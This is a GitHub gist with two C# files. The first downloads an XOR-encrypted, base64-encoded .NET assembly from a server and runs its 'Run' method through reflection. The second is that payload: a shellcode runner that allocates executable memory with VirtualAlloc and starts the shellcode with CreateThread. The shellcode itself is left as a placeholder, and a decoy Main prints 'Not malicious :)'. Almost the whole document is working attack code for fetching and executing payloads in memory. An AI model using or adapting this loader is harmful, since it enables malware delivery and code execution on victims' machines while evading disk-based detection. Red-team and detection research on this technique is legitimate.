Last active
October 4, 2020 02:44
-
-
Save mvelazc0/4a56e1829ef3bd2784b6f06e35cb0ff2 to your computer and use it in GitHub Desktop.
Downloads a XOR encrypted assembly payload (Payload.cs) and executes the "Run" method using .NET reflection
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Collections.Generic; | |
| using System.IO; | |
| using System.Linq; | |
| using System.Net; | |
| using System.Reflection; | |
| using System.Text; | |
| namespace GetAndRun | |
| { | |
| class Program | |
| { | |
| static void Main(string[] args) | |
| { | |
| string server = args[0]; | |
| string key = args[1]; | |
| WebClient client = new WebClient(); | |
| Stream stream = client.OpenRead(server); | |
| StreamReader reader = new StreamReader(stream); | |
| byte[] code = Convert.FromBase64String(reader.ReadToEnd()); | |
| byte[] assemblyBytes = xor(code, Encoding.ASCII.GetBytes(key)); | |
| Assembly assembly = Assembly.Load(assemblyBytes); | |
| Type type = assembly.GetType("Payload.Program"); | |
| object obj = Activator.CreateInstance(type); | |
| type.InvokeMember("Run", | |
| BindingFlags.Default | BindingFlags.InvokeMethod, | |
| null, | |
| obj, | |
| new object[] { }); | |
| } | |
| private static byte[] xor(byte[] cipher, byte[] key) | |
| { | |
| byte[] xored = new byte[cipher.Length]; | |
| for (int i = 0; i < cipher.Length; i++) | |
| { | |
| xored[i] = (byte)(cipher[i] ^ key[i % key.Length]); | |
| } | |
| return xored; | |
| } | |
| } | |
| } |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Runtime.InteropServices; | |
| namespace Payload | |
| { | |
| public class Program | |
| { | |
| private static UInt32 MEM_COMMIT = 0x1000; | |
| private static UInt32 PAGE_EXECUTE_READWRITE = 0x40; | |
| [DllImport("kernel32")] | |
| private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr, | |
| UInt32 size, UInt32 flAllocationType, UInt32 flProtect); | |
| [DllImport("kernel32")] | |
| private static extern IntPtr CreateThread( | |
| UInt32 lpThreadAttributes, | |
| UInt32 dwStackSize, | |
| UInt32 lpStartAddress, | |
| IntPtr param, | |
| UInt32 dwCreationFlags, | |
| ref UInt32 lpThreadId | |
| ); | |
| [DllImport("kernel32")] | |
| private static extern UInt32 WaitForSingleObject( | |
| IntPtr hHandle, | |
| UInt32 dwMilliseconds | |
| ); | |
| public static void Run() | |
| { | |
| //shellcode here | |
| byte[] payload = new byte[1] { 0x00 }; | |
| UInt32 funcAddr = VirtualAlloc(0, (UInt32)payload.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE); | |
| Marshal.Copy(payload, 0, (IntPtr)(funcAddr), payload.Length); | |
| IntPtr hThread = IntPtr.Zero; | |
| UInt32 threadId = 0; | |
| IntPtr pinfo = IntPtr.Zero; | |
| hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId); | |
| WaitForSingleObject(hThread, 0xFFFFFFFF); | |
| } | |
| public static void Main() | |
| { | |
| Console.WriteLine("Not malicious :)"); | |
| } | |
| } | |
| } |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment